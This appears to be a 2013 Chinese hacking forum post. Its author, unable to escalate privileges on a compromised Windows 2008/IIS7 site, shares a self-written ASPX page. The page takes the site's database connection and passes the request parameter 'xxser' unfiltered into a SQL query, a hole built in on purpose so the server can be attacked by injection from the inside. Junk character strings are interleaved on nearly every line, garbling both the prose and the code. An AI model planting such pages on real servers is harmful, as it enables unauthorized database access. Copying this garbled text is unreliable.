昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。; L$ F- B5 J$ A: v7 ]* Y* d: m/ P( @
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。7 j, g) r0 c- \$ T4 Y
代码量不多,自己写个拉倒了。烦死了。
2 v* j. F9 h8 ~* x4 \+ k: A E! u1 H* z
7 R' L v8 n# D; A3 \8 \% {1 T4 S<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> M/ k( o6 o q3 a$ e
<html xmlns="http://www.w3.org/1999/xhtml">
+ F. A& U/ l4 V1 p4 W<head runat="server">5 `5 S3 m6 x+ h; c$ {; }8 f' L
<title>暗影aspx构造注射专用页面</title>
/ f; B3 X7 ]5 d% l* @+ C</head>
4 z. Y/ D; B1 o4 z4 I: }<body>; g5 _) |1 M7 ?+ @; ?8 j* d! D
<form id="form1" runat="server">
: A, Y5 [. n. T2 a7 ]9 C$ _5 b <div>/ e) y% s# u; X7 U
<script language="c#" runat="server">
+ x9 d% V0 w( b8 X) n; k1 X : Y* r. Y) u3 A
void page_init(object sender, EventArgs e)0 d% G; L: L. n
{# @4 G4 t3 F9 @9 i
* _/ L$ _: e% F; x
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();8 Y& x v' f" \9 n6 j5 W
# i' }. E C' ]0 N8 H- `
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
3 `5 {+ W6 C4 f9 W7 [: _! D conn.Open();: b0 G% H6 S! @ j3 I
/ r3 L- p" x: }( e4 f1 t$ f) { string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
6 {1 O" W) c2 _! J# C, G, u `8 j * f s8 `+ h3 m
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
- a+ O Z' |! s& r5 ~; E1 q* W' l int x = command.ExecuteNonQuery();" a3 A$ H S: x9 R9 {9 c4 D" F( v
Response.Write(i+"\n"); }* F' ]* P: O5 u7 Y ~% m
Response.Write(x);5 Q3 ?8 u' {" c" Q8 |
conn.Close();0 l2 U1 K+ Z J* s
}* ~- S; y; W' l0 p; I0 \
) \* D3 _% B% `% H </script>4 S2 J$ w& g# a- u( U
</div>
# Y6 l5 K( h [2 | </form>& z2 R" E7 {2 F6 F! A9 \; X
</body>4 O3 W7 @* b) O; a% v5 T9 f
</html>
O8 j1 y' }$ _3 t |
发表于 2013-3-20 21:32:01
收藏
支持
反对